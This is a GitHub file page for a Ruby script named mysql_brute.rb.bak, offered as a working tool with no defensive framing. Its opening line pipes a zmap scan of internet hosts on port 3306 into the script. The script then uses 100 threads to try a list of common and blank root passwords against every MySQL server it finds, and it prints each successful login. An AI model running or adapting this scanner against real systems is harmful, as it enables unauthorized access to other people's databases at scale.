-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathmysql_brute.rb.bak
82 lines (75 loc) · 2.18 KB
/
mysql_brute.rb.bak
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
zmap -p 3306 -N 1000 -o - | ruby mysql_brute.rb
require 'mysql2'
require 'pp'
require 'thread/pool'
#gem install mysql2
#gem install thread
#if !ARGV[0]
# puts "usage: #{$0} <host_file>"
# exit
#end
$passwords = ["", '123456', 'admin', 'root', 'mysql', 'password', '111111']
#$passwords = [""]
class MysqlBrute
def initialize
end
def run(host, username, password, port=3306)
success = false
begin
dbh = Mysql2::Client.new(:host=>host,:username=>username, :password=>password, :port=>port, :connect_timeout=>5)
results = dbh.query("SELECT VERSION();")
success = true if results.size>0
rescue Mysql2::Error => e
#puts e
ensure
dbh.close if dbh
end
success
end
end
$pool = Thread.pool(100)
if ARGV[0]
# read host file
File.open(ARGV[0], 'r') { |f|
f.each { |l|
re = /((?:(?:[0-9][0-9]?|[0-1][0-9][0-9]|[2][0-4][0-9]|[2][5][0-5])\.){3}(?:[0-9][0-9]?|[0-1][0-9][0-9]|[2][0-4][0-9]|[2][5][0-5]))(?:\:(\d{1,5}))?/.match l
if re && re[1]
port = 3306
port = re[2].to_i if re[2]
$passwords.each { |p|
$pool.process ({:host=>re[1], :user=>'root', :pass=>p, :port=>port}) { |obj|
if MysqlBrute.new.run(obj[:host], obj[:user], obj[:pass], obj[:port])
puts "[SUCCESS]"+obj[:host]+" password is : " + obj[:pass]
else
#puts "[FAILED]"+obj[:host]+" of password :" + obj[:pass]
end
}
}
end
}
}
else
while l = gets
re = /((?:(?:[0-9][0-9]?|[0-1][0-9][0-9]|[2][0-4][0-9]|[2][5][0-5])\.){3}(?:[0-9][0-9]?|[0-1][0-9][0-9]|[2][0-4][0-9]|[2][5][0-5]))(?:\:(\d{1,5}))?/.match l
if re && re[1]
port = 3306
port = re[2].to_i if re[2]
$passwords.each { |p|
$pool.process ({:host=>re[1], :user=>'root', :pass=>p, :port=>port}) { |obj|
if MysqlBrute.new.run(obj[:host], obj[:user], obj[:pass], obj[:port])
puts "[SUCCESS]"+obj[:host]+" password is : " + obj[:pass]
else
#puts "[FAILED]"+obj[:host]+" of password :" + obj[:pass]
end
}
}
end
end
end
#while !$pool.done? do
# pp $pool
# sleep 1
#end
$pool.wait_done
$pool.shutdown
# each line MysqlBurte.new.run()